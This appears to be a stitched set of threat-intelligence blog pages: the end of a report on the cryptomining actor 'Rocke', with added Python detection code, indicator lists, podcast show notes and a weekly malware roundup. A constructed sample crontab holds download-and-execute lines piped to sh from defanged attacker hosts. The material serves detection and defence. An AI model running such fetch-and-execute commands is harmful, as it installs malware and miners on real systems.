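    """Return /etc/ld.so.preload entries outside the system library directories.
    The file is normally empty; libprocesshider-style hiding works by listing a
    shared object here so every new process loads it before anything else."""
    return [entry for entry in ld_so_preload.split()
            if not entry.startswith(TRUSTED_LIB_DIRS)]


# Constructed crontab: one benign maintenance job, one benign fetch that is not
# executed, and two download-and-execute jobs modelled on the post.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/find /var/log -mtime +30 -delete
0 * * * * curl -s https://status.example.org/health > /dev/null
*/10 * * * * (curl -fsSL hxxp://3389[.]space/logo.jpg || wget -q -O- hxxp://3389[.]space/logo.jpg) | sh
@reboot wget -q hxxp://118[.]24[.]150[.]172:10555/r88.sh -O /tmp/r88.sh && sh /tmp/r88.sh
"""

# Constructed preload file naming a library in a non-system directory.
SAMPLE_LD_SO_PRELOAD = "/usr/local/lib/libprocesshider.so\n"


if __name__ == "__main__":
    for finding in cron_findings(SAMPLE_CRONTAB):
        print("cron:", finding)
    print("preload:", preload_findings(SAMPLE_LD_SO_PRELOAD))
```

Feed it the output of `crontab -l` (and the files under /etc/cron.d) together with the contents of /etc/ld.so.preload. The preload check is a heuristic: some legitimate software does install preload libraries under /usr/local/lib, so a hit is a lead to inspect the named library, not a verdict on its own.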




"Config.json" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This is why we have named the actor "Rocke" (note that for MinerGate, an email can be used in place of a Monero wallet number — it's simply the login email for the MinerGate platform). "Pools.txt" appears to be a config file for XMR-stak, an open-source universal Stratum pool miner that mines Monero, Aeon and more. This configuration file contains the same actor pool and wallet information as the first.

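Because both configuration files carry the same pool and login, they are a convenient hunting artifact. The Python below is an added example, not code from this post, that pulls the pool host and wallet/login out of miner configuration text and compares them with the indicators named here. It assumes XMRig's "pools" array with "url" and "user" keys and XMR-stak's "pool_address" and "wallet_address" keys; because an XMR-stak pool list is JSON-like but not valid JSON, the parser falls back to a regex over quoted key/value pairs. All sample configurations are constructed.

```python
"""Extract the pool host and wallet/login from miner configuration text and
compare them with the indicators named in the post.  Added example; the
configurations below are constructed, not recovered samples."""
import json
import re
from typing import Any, Dict, List

# Pool and MinerGate login the post attributes to the actor.
KNOWN_POOLS = {"xmr.pool.minergate.com"}
KNOWN_LOGINS = {"rocke@live.cn"}

# Assumed key names: XMRig uses "url"/"user" inside its "pools" array,
# XMR-stak uses "pool_address"/"wallet_address" inside "pool_list".
POOL_KEYS = ("url", "pool_address")
LOGIN_KEYS = ("user", "wallet_address")

# Quoted key/value pairs, for configs that are not strict JSON.
KV_RE = re.compile(r'"(?P<key>[A-Za-z_]+)"\s*:\s*"(?P<val>[^"]*)"')


def pool_host(endpoint: str) -> str:
    """Normalise a pool endpoint to its bare host: drop scheme, port and case."""
    endpoint = re.sub(r"^[a-z+]+://", "", endpoint.strip().lower())
    return endpoint.split(":")[0]


def _walk_json(obj: Any) -> List[Dict[str, str]]:
    """Collect {host, login} from every object that carries a pool key."""
    found = []
    if isinstance(obj, dict):
        pool = next((obj[k] for k in POOL_KEYS if k in obj), None)
        if pool is not None:
            login = next((obj[k] for k in LOGIN_KEYS if k in obj), "")
            found.append({"host": pool_host(str(pool)), "login": str(login)})
        for value in obj.values():
            found.extend(_walk_json(value))
    elif isinstance(obj, list):
        for value in obj:
            found.extend(_walk_json(value))
    return found


def extract_pools(text: str) -> List[Dict[str, str]]:
    """Parse strict JSON structurally; otherwise pair each pool key with the
    next login key found in the text (the XMR-stak pool list takes this path)."""
    try:
        return _walk_json(json.loads(text))
    except ValueError:
        pairs, pool = [], None
        for match in KV_RE.finditer(text):
            if match["key"] in POOL_KEYS:
                pool = match["val"]
            elif match["key"] in LOGIN_KEYS and pool is not None:
                pairs.append({"host": pool_host(pool), "login": match["val"]})
                pool = None
        return pairs


def classify(text: str) -> Dict[str, Any]:
    """Summarise a config: the pools it names and whether any matches an indicator."""
    pools = extract_pools(text)
    return {
        "pools": pools,
        "known_pool": any(p["host"] in KNOWN_POOLS for p in pools),
        "known_login": any(p["login"].lower() in KNOWN_LOGINS for p in pools),
    }


# Constructed XMRig-style config.json carrying the pool and login from the post.
SAMPLE_XMRIG = json.dumps({
    "algo": "cryptonight",
    "pools": [{"url": "xmr.pool.MinerGate.com:45700", "user": "rocke@live.cn", "pass": "x"}],
})

# Constructed XMR-stak-style pools.txt: a bare key list that is not valid JSON.
SAMPLE_POOLS_TXT = '''
"pool_list" :
[
    {"pool_address" : "xmr.pool.MinerGate.com:45700", "wallet_address" : "rocke@live.cn",
     "pool_password" : "x", "use_tls" : false, "pool_weight" : 1 },
],
"currency" : "monero",
'''

# Constructed config pointing at an unrelated pool; must not match.
SAMPLE_BENIGN = json.dumps({"pools": [{"url": "pool.example.org:3333", "user": "wallet-placeholder"}]})


if __name__ == "__main__":
    for name, cfg in [("xmrig", SAMPLE_XMRIG), ("xmr-stak", SAMPLE_POOLS_TXT), ("benign", SAMPLE_BENIGN)]:
        print(name, classify(cfg))
```

The same logic applies to the "xmr.txt" file that "TermsHost.exe" retrieves later in the post, since it carries the same pool and login. Matching on the pool host alone is the more durable check: an actor can rotate a login far more easily than the pool they are paid through.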
"Bashf" is a variant of XMR-stak while "bashg" is a variant of XMRig.



"Lowerv2.sh" and "rootv2.sh" are similar shell scripts that attempt to download and execute the mining malware components "bashf" and "bashg," hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called "XbashY" from 3g2upl4pq6kufc4m[.]tk.

"R88.sh" is a shell script that installs a cron job and attempts to download "lowerv2.sh" or "rootv2.sh."

"TermsHost.exe" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner is sold online for $14 and is marketed to malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into "Windows processes to bypass firewalls." The sample grabs the config file "xmr.txt," which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample then injects code into notepad.exe, which then proceeds to communicate with the MinerGate pool. The sample also creates the UPX-packed file "dDNLQrsBUE.url" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system.

The payload appears to be similar to one used by the Iron Cybercrime Group, as reported by cybersecurity firm Intezer in May. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure. So, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group.

The actor


Through Rocke's MinerGate Monero wallet email rocke@live.cn, we were able to uncover additional information about the actor. We noticed that Rocke's C2 was registered to the address jxci@vip.qq.com. We then found a leak of user information from the Chinese security site FreeBuf that showed that a user named "rocke" was associated with the email jxci@vip.qq.com. This suggested that they were one and the same. [4]

Rocke has been observed seeking access to cloud storage services, as well as obtaining manuals for programming in the Chinese Easy language.

The majority of websites registered to Rocke list Jiangxi Province addresses for their registration. Some of these websites were for Jiangxi-based businesses, such as belesu[.]com, which sells baby food. We had additional indications that Rocke is from Jiangxi based on their GitHub (see below). It is possible that the "jx" in jxci@vip.qq.com stands for Jiangxi. Therefore, we assess with high confidence that Rocke operates from Jiangxi Province.

The GitHub


We identified a GitHub page apparently associated with Rocke. The GitHub page lists Rocke as being affiliated with Jiangxi Normal University. In one repository folder, we found several of the same files which were found on the HFS system, including several of the shell scripts with their wallet information included, as well as variants of the miner.



We found additional repositories for the same account. Within these repositories, we found scripts similar to those found in previous campaigns, with the exception that they reached out to sydwzl[.]cn in addition to the previously observed domain 3389[.]space. These findings support the link between Rocke and the activity we previously observed in April and May.

We also found an additional repository through Rocke's page that's hosting nearly identical content, but with a different C2. However, we are unable to determine how that page is being used or who is using it.

The files within their various repositories show that Rocke has become interested in browser-based JavaScript mining through the tool CryptoNote, as well as browser-based exploitation through the Browser Exploitation Framework. It appears that they are relying on fake Google Chrome alerts, fake apps, and fake Adobe Flash updates to social engineer users into downloading malicious payloads.





One of the JavaScript files in the repository, named "command.js," uses hidden IFrames to deliver payloads hosted on CloudFront domains. The payload that we were able to obtain was UPX packed and behaved very similarly to the file "dDNLQrsBUE.url" dropped by "TermsHost.exe."

Rocke has also shown interest in other security-related repositories. They have forked repositories with exploit information, including those related to Apache Struts 2, JBoss and Shadow Brokers, as well as more general-use tools such as masscan, proxy tools and brute forcers.

Conclusion


Based on their activity in the past few months, Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines. It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates.

Despite the volatility in the value of various cryptocurrencies, the trend of illicit cryptocurrency mining activity among cybercriminals shows no signs of abating. Rocke's various campaigns show the variety of infection vectors, malware, and infrastructure that these criminals will employ to achieve their goals.

IOCs:



Earlier campaign:



Attacking IPs targeting Struts:



52[.]167[.]219[.]168: Attacking IP using repo at gitlab
120[.]55[.]226[.]24: Attacking IP using repo at gitee

Attacking IP targeting WebLogic:



27[.]193[.]180[.]224

Attacking IPs targeting ColdFusion:



112[.]226[.]250[.]77
27[.]210[.]170[.]197
112[.]226[.]74[.]162

Domains


3389[.]space

URLs


hxxps://gitee[.]com/c-999/ss/raw/master/ss/a
hxxps://gitee[.]com/c-999/ss/raw/master/ss/config[.]json
hxxps://gitee[.]com/c-999/ss/raw/master/ss/dir[.]dir
hxxps://gitee[.]com/c-999/ss/raw/master/ss/h32
hxxps://gitee[.]com/c-999/ss/raw/master/ss/upd
hxxps://gitee[.]com/c-999/ss/raw/master/ss/x86_64
hxxps://gitee[.]com/c-999/ss/raw/master/ss/h64
hxxps://gitee[.]com/c-999/ss/raw/master/ss/x
hxxps://gitee[.]com/c-999/ss/raw/master/ss/run
hxxps://gitee[.]com/c-999/ss/raw/master/ss/logo[.]jpg
hxxps://gitee[.]com/c-888/ss/raw/master/ss/a
hxxps://gitee[.]com/c-888/ss/raw/master/ss/cron[.]d
hxxps://gitee[.]com/c-888/ss/raw/master/ss/dir[.]dir
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/x
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/x86_64
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/run
hxxps://gitee[.]com/c-888/ss/raw/master/ss/upd
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/upd
hxxps://gitee[.]com/c-888/ss/raw/master/ss/x
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/cron[.]d
hxxps://gitee[.]com/c-888/ss/raw/master/ss/h64
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/a
hxxps://gitee[.]com/c-888/ss/raw/master/ss/config[.]json
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/config[.]json
hxxps://gitee[.]com/c-888/ss/raw/master/ss/run
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/h32
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/dir[.]dir
hxxps://gitee[.]com/c-888/ss/raw/master/ss/x86_64
hxxps://gitee[.]com/c-888/ss/raw/master/ss/h32
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/h64
hxxp://93[.]174[.]93[.]149/[.]xxxzlol[.]tar[.]gz
hxxps://gitee[.]com/c-888/ss/raw/master/ss/logo[.]jpg
hxxps://gitlab[.]com/c-18/ss/raw/master/ss/logo[.]jpg

Hashes:


Logo.jpg: ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a
a: 6ec8201ef8652f7a9833e216b5ece7ebbf70380ebd367e3385b1c0d4a43972fb
cron.d: f6a150acfa6ec9d73fdecae27069026ecf2d833eac89976289d6fa15713a84fe
dir.dir: a20d61c3d4e45413b001340afb4f98533d73e80f3b47daec42435789d12e4027
h32: 45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161
h64: 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf

logo.jpg (from gitee[.]com): f1f041c61e3086da8157745ee01c280a8238a379ca5b4cdbb25c5b746e490a9b

logo.jpg (from gitlab[.]com): ad68ab153623472bbd8220fb19c488ae2884d9b52bc65add5d54b1821b4b743a

run: 0c358d826c4a32a8c48ce88eb073f505b555fc62bca6015f5270425c58a0d1c5
upd: 187d06f1e6020b6787264e2e700c46c463a7818f07db0b051687f3cba65dbe0b
x (32-bit miner): 6e80a9d843faf27e239b1a767d29c7443972be1ddf5ff5f5f9fc9a2b55a161f5
x86_64 (64-bit miner): 2ad07f8d1985f00cd05dafacbe5b6a5b1e87a78f8ae8ecdf91c776651c88a612

More recent campaign:



IPs


123[.]249[.]9[.]149: Issues get request for 0720.bin
118[.]24[.]150[.]172: Rocke's HFS, also resolves to C2 sydwzl[.]cn

Domains:


sydwzl[.]cn
blockbitcoin[.]com: Reached out to by Install.exe
dazqc4f140wtl[.]cloudfront[.]net: file server
3g2upl4pq6kufc4m[.]tk: file server
d3goboxon32grk2l[.]tk: file server
enjoytopic[.]tk: file server
realtimenews[.]tk: file server
8282[.]space: older C2

Domains registered to Rocke (not all are necessarily malicious):



5-xun[.]com
88180585[.]com
firstomato[.]com
jxtiewei[.]com
ncyypx[.]net

URLs


hxxp://d20blzxlz9ydha[.]cloudfront[.]net/Install.exe
hxxp://www[.]amazon[.]com:80/N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe=ISO-8859-1;&sn=12275&s=3717&dc_ref=http%3A%2F%2Fwww.amazon.com
hxxp://www[.]amazon[.]com:80/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

Hashes


55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b 0720.bin
751cb6c39691904ffbef86fe3bdfa737e4ba64add4dd90358245fa2b775 3307.bin
89b3463664ff13ea77256094844c9cf69d3e408d3daf9ffad3aa18af39bab410 TermsHost.exe
d341e3a9133e534ca35d5ccc54b8a79f93ff0c917790e7d5f73fedaa480a6b93 a7
442e4a8d35f9de21d5cbd9a695a24b9ac8120e548119c7f9f881ee16ad3761e6 bashf
7674e0b69d848e0b9ff8b82df8671f9889f33ab1a664f299bcce13744e08954c bashg
7051c9af966d1c55a4096e2af2e6670d4fc75e00b2b396921a79549fb16d03d4 lowerv2.sh
2f5bf7f1ea7a84828aa70f1140774f3d4ce9985d05a676c8535420232e2af87e pools.txt
ba29d8a259d33d483833387fad9c7231fbb3beb9f4e0603b204523607c622a03 config.json
7c2dbc0d74e01a5e7c13b4a41d3a1f7564c165bd532e4473acea6f46405d0889 r88.sh
d44e767132d68fdb07c23c848ff8c28efe19d1b7c070161b7bd6c0ccfc858750 rootv2.sh
35cb971daafd368b71ad843a4e0b81c80225ec20d7679cfbf78e628ebcada542 Install.exe
654ec27ea99c44edc03f1f3971d2a898b9f1441de156832d1507590a47b41190 ZZYO
F808A42B10CF55603389945A549CE45EDC6A04562196D14F7489AF04688F12BC XbashY
725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054 reg9.sct
d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6 m.png
ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50 hidden executable in m.png


Beers with Talos EP 36: There Are Few Shades in the Grey Market



Beers with Talos (BWT) Podcast Ep. #36 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast.

Ep. #36 show notes: 

Recorded Aug. 24, 2018 — We’re finally back in the studio after Hacker Summer Camp! Sadly, due to summer vacations and becoming bionic, we are missing Joel and Nigel, respectively. We end up discussing most of our topics through the lens of Matt’s frequent Twitter polls. We also find out he bribes followers with free sporks. Craig brings the discussion on the details of Remcos, and goes through some interesting points on the emerging grey markets in security software and "vuln disco." The crew closes this episode discussing the hypothetical merits of perfect patching versus perfect visibility.

The timeline:

The topics



01:20 - Roundtable - Today we cover Matt’s cyberwar fantasy league draft picks & Fortnite malware
13:25 - Remcos: Unpacking a botnet in a box
21:35 - What’s your plan for tomorrow? Are you a leader or will you follow?
28:40 - Grey market software and tools - what’s for real and what’s just sketch?
37:00 - Would You Rather…? Perfect visibility vs. Perfect patching

The links

Matt’s Cyberwar fantasy league poll: https://twitter.com/kpyke/status/1032453567418904576
The benevolent spork god of Twitter: https://twitter.com/hashtag/SporkFest2016?src=hash
Remcos post on Talos blog: https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html
Remcos decryptor: https://github.com/Cisco-Talos/remcos-decoder/blob/master/remcos_decryptor.py
Michael Potto tweet: https://twitter.com/PahDoh/status/1032747023068524544
Matt’s Twitter poll pt. 2, patching vs. viz: https://twitter.com/kpyke/status/1030081526002802689
Source of Craig’s quote in print?: nah. 

==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).  Special Guest: Bill Largent (@security_will).
Hosted by Mitch Neff (@MitchNeff).

Find all episodes:
http://cs.co/talospodcast

Subscribe via iTunes (and leave a review!)
http://cs.co/talositunes

Check out the Talos Threat Research Blog:
http://cs.co/talosresearch

Subscribe to the Threat Source newsletter:
http://cs.co/talosupdate

Follow Talos on Twitter:
http://cs.co/talostwitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

Threat Roundup for August 24-31


Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Aug. 24 and 31. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this roundup are:


  • Win.Dropper.Zusy-6664573-0
    Dropper
    Zusy is a trojan that injects itself into other Windows processes and the browser to steal valuable information. The malware also has anti-debugging and anti-VM capabilities. It contacts a hardcoded command and control (C2) server.
     
  • Win.Dropper.Zbot-6664565-0
    Dropper
    Zeus (AKA Zbot) is a trojan package used to carry out numerous malicious tasks. It is often used to steal banking information by man-in-the-browser keystroke logging and form grabbing.
     
  • Win.Dropper.Ponystealer-6664556-0
    Dropper
    This malware is a dropper for PonyStealer, a bot that attempts to steal passwords from web browsers, email clients, instant messaging applications and other software.
     
  • Win.Malware.Generic-6664552-0
    Malware
    This malware cluster leverages common Windows registry persistence techniques to execute malicious Visual Basic scripts and executables on the system.
     
  • Win.Dropper.Llac-6664551-0
    Dropper
    This malicious remote access tool (RAT) uses registry persistence and stores various data on disk before exfiltrating it to a C2 server.
     
  • Win.Dropper.Weecnaw-6649176-0
    Dropper
    Weecnaw, also known as Razy, is often a generic detection name for a Windows trojan. It collects sensitive information from the infected host, formats and encrypts the data, and sends it to a C2 server.
     

Threats

Win.Dropper.Zusy-6664573-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: internat.exe
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: {AA2468DC-A531-6EB0-5169-325772D6D0FF}
Mutexes
  • Frz_State
IP Addresses
  • 23[.]253[.]126[.]58
Domain Names
  • aliluya[.]in
Files and or directories created
  • %LocalAppData%\Temp\~DFB720FA4531A3BD3A.TMP
  • %LocalAppData%\Temp\tmpc080dd22.bat
  • %AppData%\Media Center Programs\mgrMediaCenterPrograms.exe
File Hashes
  • 0086199586b4d80cf759ee7496d67106ea778c6d0d09b806af0d9942927b95a7
  • 0b4d9d3231a26031b91afb86601e02ae8688311f4ad171a9ec7583df21035c4b
  • 0c62bb710b7ae67438d05221daf95d71816591ec19add296e3c461ad6ac2ad89
  • 1c40de31f1d99b153d9c1195e41873b064f28d1169376fb5989927fefb7e279e
  • 1c6d8fd83497dade09939bda7e62803b3a271b0ddd91de8189666f2d33e52813
  • 3256780354a83a758a07e4b705ad83be599edeebeb26ace0586913fabe4457bf
  • 38184b0b4f6d7216d9d81a74af724285ae22c13c19d95e5f38703507d6abebe7
  • 391e0759858ba5f58888afffc6b26594da9d79dbd8ba50c56828d7855d2e5ee9
  • 56a4a40bccde01c52092ef1d5b241adac4ee7825d9556fdbef84c12c1feddc73
  • 59c83f47fa21040feaf2885f4edebcb06eff21f24b9df980647e7a4d3fb9a2d0
  • 5aa0c86a9e558671bd930e5a812b88ed19a7ebff291ed6b5a55c781b16dc7ea8
  • 5e900d84431fcf62677eafa305ae03d03300c5fe74a98d825e3dfdf184c040b2
  • 6963f52b20f628e9e31378ce0fdd3e2124010d8f775e05af3dab4a94b2a30b75
  • 74d50d5b7c750105f2797bf2d145ff43eb0b2c76851b6c7de665464ec8642210
  • 75872f30f9518032f327d82c602349f1cb304fc82a694d668ad7b5e0f6db2bf5
  • 7636612f4b131119c7590757bc9c76b0fc3bbe40b8558b83b532ece91f6732b3
  • 85f65115b4cdbb9401720770f1eaeca347b036694565d643c69d09b3be1e849a
  • 928be3e04601466e47a567e422c7da279383bf6e23e513c352298a02d85823cb
  • b323a535c8aee0c715e1a9821fe3d60c52a309ebf269b0173118dc91eaab700e
  • b81bad519ab37a8b7ea6083113007202d6bdc52a357c4a82ab3433c3b1d86c6b
  • cb6646bb13c59f72a36ef4c626dd93979caae8cdf26be0dd00be810af7d0cc53
  • db942618b5b1a7c8d86b02aad84cde08642d482194104d194c9022216ca01234
  • e0ed7aabff9ea95e2f839cad7acc9e7ffe2d2e458282b29c0d2db486c487a5d1
  • e801b71fcb36a12a577668df03fd60ff1a4688fd8b4cbeb410d23731c5d62dcf
  • eb5e76483e2c73c0a4a7c3701840ce932858268be01f4cda6dda69edd31e750a

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella


Win.Dropper.Zbot-6664565-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
    • Value Name: CleanCookies
  • <HKCU>\SOFTWARE\MICROSOFT\SEUQV
    • Value Name: Ugtu
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: {06D9E66C-0AFF-8E20-8FE8-15D3DC7C7959}
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • neosz[.]org
Files and or directories created
  • %LocalAppData%\Temp\tmp8bb49f41.bat
  • %AppData%\Xenyed
  • %AppData%\Xenyed\ilcoa.exe
  • %AppData%\Ymcap
  • %AppData%\Ymcap\noapb.dat
File Hashes
  • 0285541620b688aac940d046ab3f4c7e60069512421ea353f4a556c5797fa9cf
  • 07d1cf27ef446b7a9396f11ecbb3bff7a87af12aeee9fc883dffbd936cce57b4
  • 095f4d3c133a236117fcc1c9f4ffac1dbe79da38d8f9e1dd29a60f24066875e6
  • 1428e72b2e980bdad9095db2b4a4f717876c7401fbce8eaa89ab0c819ee757cd
  • 282f842a03a9410b88b53f53bb63164a9c0a3f6da18e2f96591dac878ac7aa57
  • 2878b048863aae2873ed90682fef68c8736188abd794f2c36b417e747edcfaed
  • 28f8077f0bff09d8ea3da43c62872941219f1b6a982617df44b416279e3d349d
  • 365ff8a7502272e69efe70386f40eb84a4098576564b188b41cec2c797b5d444
  • 5ea643b56af71e4c3940a4796de973ab70e923b88a8d3b3e53c66cae64ea9a21
  • 7230a35ea0eae6f00f6227eef9e1cb3fd0adf716bee3ff2e7285c9fc44209f28
  • 731dc53c805261be26238ac99f28e5e505a0afe3396e18d76817330832b95815
  • 856cf0c277af096077fe168c2036538c5d23f62eb125e6b63c48cfbf39c3507b
  • de3bf89db7d8312fb6c9a6309ddda2ad8925915e57ae3509ffaa8e55a2479a7b
  • ea8fa87b2501b9ac4d884fb53ec14fcf55f7877f68536640fd8c990f42997318
  • f74da9f23d40cc7a7a6f513710a34e1693defa1b26356aaa5a93465454c900d3

Coverage


Screenshots of Detection

AMP




ThreatGrid


Win.Dropper.Ponystealer-6664556-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: AGP Manager
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
    • Value Name: AGP Manager.job
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
    • Value Name: AGP Manager.job.fp
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{2AED832F-FA37-41E1-9869-53556FC4E018}
    • Value Name: Path
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{2AED832F-FA37-41E1-9869-53556FC4E018}
    • Value Name: Hash
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER
    • Value Name: Id
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER
    • Value Name: Index
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{2AED832F-FA37-41E1-9869-53556FC4E018}
    • Value Name: Triggers
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
    • Value Name: AGP Manager Task.job
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
    • Value Name: AGP Manager Task.job.fp
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5BA6AC36-8FC9-4BF2-8699-D1C5E4B53ED2}
    • Value Name: Path
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5BA6AC36-8FC9-4BF2-8699-D1C5E4B53ED2}
    • Value Name: Hash
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER TASK
    • Value Name: Index
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER TASK
    • Value Name: Id
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5BA6AC36-8FC9-4BF2-8699-D1C5E4B53ED2}
    • Value Name: Triggers
  • <HKLM>\Software\Wow6432Node\Microsoft\Windows Script Host\Settings
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
    • Value Name: calenderfile
  • <HKLM>\http://szccf361.com//trqcer/xx/les/fre.php
Mutexes
  • 3749282D282E1E80C56CAE5A
  • CKVXlxMv
IP Addresses
  • 185[.]148[.]241[.]42
Domain Names
  • szccf361[.]com
Files and or directories created
  • %LocalAppData%\Temp\subfolder
  • %LocalAppData%\Temp\subfolder\calenderfile.scr
  • %ProgramFiles% (x86)\AGP Manager
  • %LocalAppData%\Temp\subfolder\calenderfile.vbs
  • %ProgramFiles% (x86)\AGP Manager\agpmgr.exe
  • %AppData%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5
  • %AppData%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs
  • %AppData%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator
  • %AppData%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat
  • %System32%\Tasks\AGP Manager
  • %System32%\Tasks\AGP Manager Task
  • %AppData%\D282E1
  • %AppData%\D282E1\1E80C5.lck
  • %LocalAppData%\Temp\tmpA720.tmp
  • %AppData%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat
  • %LocalAppData%\Temp\subfolder\.IgHiJkLiO
  • %LocalAppData%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol
  • \PC*\MAILSLOT\NET\NETLOGON
File Hashes
  • 36d338d4e27b80b605a8f41e6d5466c6c091f850460ad3438307fa310fee6124
  • 37b97f4b355b4d5b8515afaac65be8d472739af29b0ae710af1cd7f3c72ada90
  • 3db230f77666811830da80b685fce292b9f193e022dce1d4038cc8b9589ce9ea
  • 4dc0fcb41a2337adf6ae7298d7c3d149690c424405da81691847d7a9dcfe0cd2
  • 5b35f219098af55485f255877b0e00625ead753d08242496e74ca65d544ff32a
  • 68dea7453ba1ffd5706fe544c18c0a74b6ed307b02591a5b12e9029ce0673cd6
  • 7128acdf0af3ca1168c44a3440992dc118acaf21fa9e4fa7e9a49a22a87d8cd6
  • 741d126dae4e162b0108c30336b9a2e85c3260b321e027f02150fe8c29a54e42
  • 7ebb784df21a85f511a70c9914e42cca0f1634bbb54d83214719eba28d25076b
  • 8d03f6a8455358b197a94366e18bd21a8f89dc3804f35b7c065b6fe3b28fdd44
  • d6fd60308a1c812fae450e731dd184e33ed0d0a3c73fb7b99c35edfa174e22ac
